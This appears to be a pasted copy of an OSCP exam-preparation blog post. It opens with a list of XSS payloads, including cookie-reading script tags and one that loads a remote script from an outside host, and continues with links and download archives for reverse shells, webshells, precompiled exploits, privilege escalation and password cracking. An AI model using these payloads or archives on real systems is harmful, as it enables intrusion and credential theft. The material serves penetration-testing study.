  1152. <IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
  1153. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  1154.  
  1155.  
  1156.  
  1157. perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out
  1158.  
  1159.  
  1160.  
  1161. <BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  1162.  
  1163.  
  1164.  
  1165. ( “>< iframes http://google.de < iframes >)
  1166.  
  1167.  
  1168.  
  1169. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  1170. <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
  1171.  
  1172. “><script >alert(document.cookie)</script>
  1173. %253cscript%253ealert(document.cookie)%253c/script%253e
  1174.  
  1175. “><s”%2b”cript>alert(document.cookie)</script>
  1176. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  1177.  
  1178. <img src=asdf onerror=alert(document.cookie)>
  1179.  
  1180.  
  1181.  
  1182.  
  1183.  
  1184.  
  1185.  
  1186.  
  1187.  
  1188. Useful Links To Read and Learn:
  1189. Enumeration:
  1190.  
  1191. http://www.0daysecurity.com/penetration-testing/enumeration.html
  1192.  
  1193.  
  1194.  
  1195. Windows Shellcode:
  1196.  
  1197. http://farlight.org/index.html?type=shellcode
  1198.  
  1199. http://shell-storm.org/shellcode/
  1200.  
  1201. http://www.windowsexploits.com/
  1202.  
  1203.  
  1204.  
  1205.  
  1206.  
  1207. XSS Cheat Codes:
  1208.  
  1209. http://www.xenuser.org/xss-cheat-sheet/
  1210.  
  1211. https://gist.github.com/sseffa/11031135
  1212.  
  1213. https://html5sec.org/
  1214.  
  1215.  
  1216.  
  1217.  
  1218.  
  1219.  
  1220.  
  1221. Reverse Shell Cheat Codes:
  1222.  
  1223. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  1224.  
  1225. http://roo7break.co.uk/?p=215
  1226.  
  1227.  
  1228.  
  1229.  
  1230.  
  1231. Webshells:
  1232.  
  1233. http://www.r57shell.net/
  1234.  
  1235.  
  1236.  
  1237.  
  1238.  
  1239. Nikto Tutorial:
  1240.  
  1241. http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/
  1242.  
  1243.  
  1244.  
  1245.  
  1246.  
  1247. Exploit-db:
  1248.  
  1249. wget http://exploit-db.com/archive.tar.bz2
  1250.  
  1251.  
  1252.  
  1253.  
  1254.  
  1255. SNMP Enumeration:
  1256.  
  1257. http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09
  1258.  
  1259. http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html
  1260.  
  1261.  
  1262.  
  1263.  
  1264.  
  1265. SAMBA Enumeration:
  1266.  
  1267. http://www.iodigitalsec.com/windows-null-session-enumeration/
  1268.  
  1269. http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
  1270.  
  1271. http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html
  1272.  
  1273. http://www.madirish.net/59
  1274.  
  1275.  
  1276.  
  1277.  
  1278.  
  1279. Passhing The Hash:
  1280.  
  1281. https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
  1282.  
  1283. https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/
  1284.  
  1285.  
  1286.  
  1287. Hashcat Tutorial:
  1288.  
  1289. http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/
  1290.  
  1291.  
  1292.  
  1293.  
  1294.  
  1295. Wordlist Download:
  1296.  
  1297. https://wiki.skullsecurity.org/Passwords
  1298.  
  1299. http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html
  1300.  
  1301.  
  1302.  
  1303.  
  1304.  
  1305. NASM Tutorial:
  1306.  
  1307. http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
  1308.  
  1309.  
  1310.  
  1311.  
  1312.  
  1313.  
  1314.  
  1315. Buffer overflow Tutorial:
  1316.  
  1317.  
  1318.  
  1319. I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains exploit from basic to intermediate level with step by step debugging.
  1320.  
  1321.  
  1322.  
  1323. Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
  1324.  
  1325.  
  1326.  
  1327. SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
  1328.  
  1329.  
  1330.  
  1331. Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
  1332.  
  1333.  
  1334.  
  1335. Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
  1336.  
  1337.  
  1338.  
  1339. Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
  1340.  
  1341.  
  1342.  
  1343.  
  1344.  
  1345. ADVANCED:
  1346.  
  1347.  
  1348.  
  1349. Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever seen).
  1350.  
  1351.  
  1352.  
  1353. Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  1354.  
  1355.  
  1356.  
  1357. Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
  1358.  
  1359.  
  1360.  
  1361. Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
  1362.  
  1363.  
  1364.  
  1365. Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
  1366.  
  1367.  
  1368.  
  1369. Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
  1370.  
  1371.  
  1372.  
  1373. Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
  1374.  
  1375.  
  1376.  
  1377. Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
  1378.  
  1379.  
  1380.  
  1381. Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
  1382.  
  1383.  
  1384.  
  1385. Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
  1386.  
  1387.  
  1388.  
  1389. Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
  1390.  
  1391.  
  1392. SQL Injection Cheat Codes:
  1393.  
  1394. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  1395.  
  1396. http://resources.infosecinstitute.com/backdoor-sql-injection/
  1397.  
  1398.  
  1399.  
  1400.  
  1401.  
  1402. RFI/LFI Tutorials:
  1403.  
  1404. https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
  1405.  
  1406. http://www.hackersonlineclub.com/lfi-rfi
  1407.  
  1408. https://0xzoidberg.wordpress.com/category/security/lfi-rfi/
  1409.  
  1410.  
  1411.  
  1412.  
  1413.  
  1414. NMAP Vulsan:
  1415.  
  1416. http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
  1417.  
  1418.  
  1419.  
  1420. Online Hash Cracking:
  1421.  
  1422. http://www.objectif-securite.ch/
  1423.  
  1424.  
  1425.  
  1426.  
  1427.  
  1428. Dump Windows Password Hashes:
  1429.  
  1430. http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
  1431.  
  1432.  
  1433.  
  1434.  
  1435.  
  1436.  
  1437.  
  1438. Windows Previlige Escalation:
  1439.  
  1440. http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
  1441. http://www.fuzzysecurity.com/tutorials/16.html
  1442.  
  1443.  
  1444.  
  1445.  
  1446.  
  1447. Linux Previlige Escalation:
  1448.  
  1449. http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
  1450. http://pentestmonkey.net/tools/audit/unix-privesc-check
  1451. http://www.rebootuser.com/?p=1758
  1452.  
  1453.  
  1454.  
  1455. Tunneling & Port Forwarding:
  1456.  
  1457. http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)
  1458. http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
  1459. http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
  1460. http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
  1461. http://www.offensive-security.com/metasploit-unleashed/Portfwd
  1462. http://www.offensive-security.com/metasploit-unleashed/Pivoting
  1463. http://www.howtoforge.com/reverse-ssh-tunneling
  1464. http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
  1465. http://www.offensive-security.com/metasploit-unleashed/Msfvenom
  1466.  
  1467.  
  1468.  
  1469.  
  1470.  
  1471.  
  1472.  
  1473. Useful Links:
  1474.  
  1475. http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials
  1476. https://www.corelan.be/index.php/articles/ – Exploit tutorials
  1477. http://www.securitytube.net/ – Training videos
  1478. http://www.offensive-security.com/blog/ – Offensive Security blog
  1479. http://blog.g0tmi1k.com/ – Security blog
  1480. http://carnal0wnage.attackresearch.com
  1481. http://cybershakti.my3gb.com/
  1482. http://www.offensive-security.com/metasploit-unleashed/Introduction
  1483. http://www.securityfocus.com/
  1484. http://www.exploit-db.com/
  1485. http://nmap.org/nsedoc/
  1486. http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  1487. http://www.fuzzysecurity.com/tutorials/16.html
  1488. http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
  1489. http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
  1490. http://pentestmonkey.net/tools/audit/unix-privesc-check
  1491. http://pentestmonkey.net/tools/windows-privesc-check
  1492.  
  1493.  
  1494.  
  1495.  
  1496.  
  1497.  
  1498.  
  1499. Videos:
  1500.  
  1501. http://www.securitytube.net/
  1502. http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
  1503. http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)
  1504.  
  1505.  
  1506.  
  1507.  
  1508.  
  1509. Privilege Escalation in Windows:
  1510.  
  1511. http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore
  1512. http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller And Chris Gates
  1513. http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519. Buffer Overflow Tutorial:
  1520.  
  1521. http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156
  1522. http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html
  1523. http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148
  1524.  
  1525.  
  1526.  
  1527.  
  1528.  
  1529. https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetration Testing)
  1530.  
  1531. https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)
  1532.  
  1533. https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )
  1534.  
  1535. https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)
  1536.  
  1537. https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)
  1538.  
  1539. http://www.securitytube.net/video/7640 (Simple buffer overflow)
  1540.  
  1541. https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)
  1542.  
  1543. http://www.securitytube.net/video/7735 (Avoiding bad characters)
  1544. PDF:
  1545.  
  1546. https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)
  1547.  
  1548. https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Exploitation Command)
  1549.  
  1550. http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitation Command List)
  1551.  
  1552. http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)
  1553.  
  1554. http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation)
  1555.  
  1556.  
  1557.  
  1558.  
  1559.  
  1560. Best Book I refer:
  1561.  
  1562. http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641
  1563.  
  1564.  
  1565.  
  1566. Windows compiled Exploit Reference:
  1567.  
  1568.  
  1569.  
  1570. Those who have not enough lab time to compile their windows exploit, I will recommend you to download and compile the Mike Czumak Windows pre-compiled reference chart. I compiled it using Visual Studio and GNU Code-blocks, really it will very useful at the time of exam.
  1571.  
  1572. I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at sathisharthar@gmail.com (Note: don’t try to bruteforce it, its more than 20 words)
  1573.  
  1574.  
  1575.  
  1576. http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv
  1577.  
  1578.  
  1579.  
  1580.  
  1581.  
  1582.  
  1583.  
  1584. Windows Tools, Scripts and Pre-Compiled Exploit for Remote and Priviledge Escalation:
  1585.  
  1586.  
  1587.  
  1588. http://download1582.mediafire.com/atk42ybutgcg/wqnw5c3ljgudqiv/windows.zip
  1589.  
  1590.  
  1591.  
  1592. I added some tools and script in that for windows machines.
  1593.  
  1594.  
  1595.  
  1596. Screenshot from 2015-01-27 19:11:47
  1597.  
  1598.  
  1599.  
  1600. Screenshot from 2015-01-27 19:12:22
  1601.  
  1602.  
  1603.  
  1604. Screenshot from 2015-01-27 19:12:51
  1605.  
  1606.  
  1607.  
  1608. Screenshot from 2015-01-27 19:13:47
  1609.  
  1610.  
  1611.  
  1612.  
  1613.  
  1614. Linux Precompiled Exploits for Local Root Exploit:
  1615.  
  1616.  
  1617.  
  1618. http://www.mediafire.com/download/os1i1ble6b0sm8g/linux.zip
  1619.  
  1620.  
  1621.  
  1622. Screenshot from 2015-01-27 19:15:08
  1623.  
  1624.  
  1625.  
  1626. Screenshot from 2015-01-27 19:15:30
  1627.  
  1628.  
  1629.  
  1630.  
  1631.  
  1632.  
  1633.  
  1634. Some Usefull PenTesting scripts:
  1635.  
  1636.  
  1637.  
  1638. http://www.mediafire.com/download/j4qz4y41qfrjo9m/script.zip
  1639.  
  1640.  
  1641.  
  1642. Screenshot from 2015-01-27 19:16:00
  1643.  
  1644.  
  1645.  
  1646.  
  1647.  
  1648.  
  1649.  
  1650. Usefull Network Service Scanning Scripts:
  1651.  
  1652.  
  1653.  
  1654. http://www.mediafire.com/download/03xld2cb755jd4p/scanner.zip
  1655.  
  1656.  
  1657.  
  1658. Screenshot from 2015-01-27 19:15:45
  1659.  
  1660.  
  1661.  
  1662.  
  1663.  
  1664. Usefull Wordlist For Bruteforce:
  1665.  
  1666.  
  1667.  
  1668. http://www.mediafire.com/download/sv4hs7p67924yk9/wordlists.zip
  1669.  
  1670.  
  1671.  
  1672.  
  1673.  
  1674. Usefull Reverse Shell Payloads and Webshells:
  1675.  
  1676.  
  1677.  
  1678. http://www.mediafire.com/download/fs5pa4nq3nhi8ja/shell.zip
  1679.  
  1680. http://www.mediafire.com/download/p0f77dblr2yzeaa/webshells.zip
  1681.  
  1682.  
  1683.  
  1684. Screenshot from 2015-01-27 19:16:20
  1685.  
  1686.  
  1687.  
  1688.  
  1689.  
  1690. I Hopes, It will helpful for guys who doing OSCP Training and Exam. If any doubts related to the post ping me…
  1691. About these ads
  1692. Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional
RAW Paste Data